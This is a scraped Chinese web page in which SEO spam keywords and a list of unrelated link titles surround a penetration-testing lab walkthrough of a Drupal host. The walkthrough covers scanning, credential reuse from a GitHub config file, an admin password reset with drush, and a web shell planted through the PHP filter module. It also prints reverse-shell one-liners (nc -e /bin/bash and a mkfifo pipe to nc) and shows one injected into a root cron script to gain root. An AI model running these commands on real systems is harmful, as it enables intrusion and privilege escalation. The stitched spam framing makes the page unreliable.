当前位置: 首页 > news >正文

如何申请我的网站甘孜建设网站首页

如何申请我的网站,甘孜建设网站首页,从化网站开发,太原网站建设质量推荐❤️博客主页#xff1a; iknow181 #x1f525;系列专栏#xff1a; 网络安全、 Python、JavaSE、JavaWeb、CCNP #x1f389;欢迎大家点赞#x1f44d;收藏⭐评论✍ 一、收集信息 1.查看主机是否存活 nmap -T4 -sP 192.168.216.149 2.主动扫描 看开放了哪些端口和功能 n… ❤️博客主页 iknow181 系列专栏 网络安全、 Python、JavaSE、JavaWeb、CCNP 欢迎大家点赞收藏⭐评论✍ 一、收集信息 1.查看主机是否存活 nmap -T4 -sP 192.168.216.149 2.主动扫描 看开放了哪些端口和功能 nmap -A -p- 192.168.216.149 发现 22-ssh 80-http 3.whatweb扫描 发现有网站进一步确认 4.搜索作者 发现下面有作者 去github上搜索一下有没有相关内容 点击users看 找到一个config.php文件这是一个连接数据库的配置文件里面有用户名和密码可能和他的vps或者服务器的用户名密码匹配的 二、入侵目标主机 1.尝试进行ssh登录 2.查看文件 发现执行了/opt/scripts/backups.sh文件生成了那些.gz的文件 3.进入文件夹 发现是一个备份数据库的sh文件有可能是定时任务执行 4.利用drush 因为是drupal所有有个drush命令 drush可以修改管理员用户 进入网站的根目录修改管理员密码为123456注意命令不要有空格 5.进入网站后台 可以看到有个login 可以进入192.168.216.149/user/login,登录admin 进入content编辑文章 最好能写入php代码 6.安装php插件 整一个drupal的php插件 加载安装包 安装成功 勾选php filter并且激活 回到content发现有phpcode 7.生成木马文件写入 将其复制到content中 7.连接 8.nc连接 因为这个木马可能不太稳定 kalinc -lvp 9988 目标nc -e /bin/bash 192.168.216.161 9988 连接成功 9.美化界面 python -c import pty;pty.spawn(/bin/bash) 三、提权 1.kali监听1234端口 2.将命令写入backups.sh 因为backups.sh是一个计划任务用的root权限 echo rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 21 | nc 192.168.216.161 1234 /tmp/f backups.sh 3.等待计划任务执行 4.拿到flag
http://www.w-s-a.com/news/457658/

相关文章:

  • 国外做珠宝的网站有哪些滨湖区建设局官方网站
  • 关于中国幼教网站开发的经验中国建设银行晋中分行网站
  • 挪威网站后缀如何外贸网络推广
  • 外汇交易网站开发仟亿家设计软件好吗亿家
  • 专门教做甜品的网站郑州高新区建设环保局网站
  • 建站公司怎么获客网站建设全网营销
  • 黄石做网站的公司html免费网站模板
  • 做个商城网站怎么做便宜优酷视频网站源码
  • 网站侧边栏导航代码泰兴市住房和建设局网站
  • html网站登录界面模板确定建设电子商务网站目的
  • wordpress 多站点迁移三台网站seo
  • 工信部网站备案文件好网站建设公司地址
  • 怎么做app和网站购物网站单页面怎么做的
  • 西宁专业做网站教育网站建设策划书
  • 个人网站域名怎么起网站建设业务好跑吗
  • 网页设计的网网页设计的网站企业网站怎样做优化
  • 论文中小企业的网站建设域名网站空间
  • 宿迁网站建设联系电话现在出入邯郸最新规定
  • 男女做羞羞的事情网站30岁转行做网站编辑
  • 做企业网站的轻量级cmswordpress 越来越慢
  • 无锡中英文网站建设莱芜网络公司
  • ps软件下载官方网站相关搜索优化软件
  • 世界杯网站源码下载做网站推广代理
  • 用股票代码做网站的wordpress通过标签调用文章
  • iis添加网站ip地址树莓派运行wordpress
  • 网站空间域名多少钱宿迁做网站公司
  • 福州建设企业网站网站交互主要做什么的
  • 英文网站建设方法门户网站特点
  • 腾讯云备案 网站名称萧山城市建设网站
  • 漳浦网站建设网络营销推广策略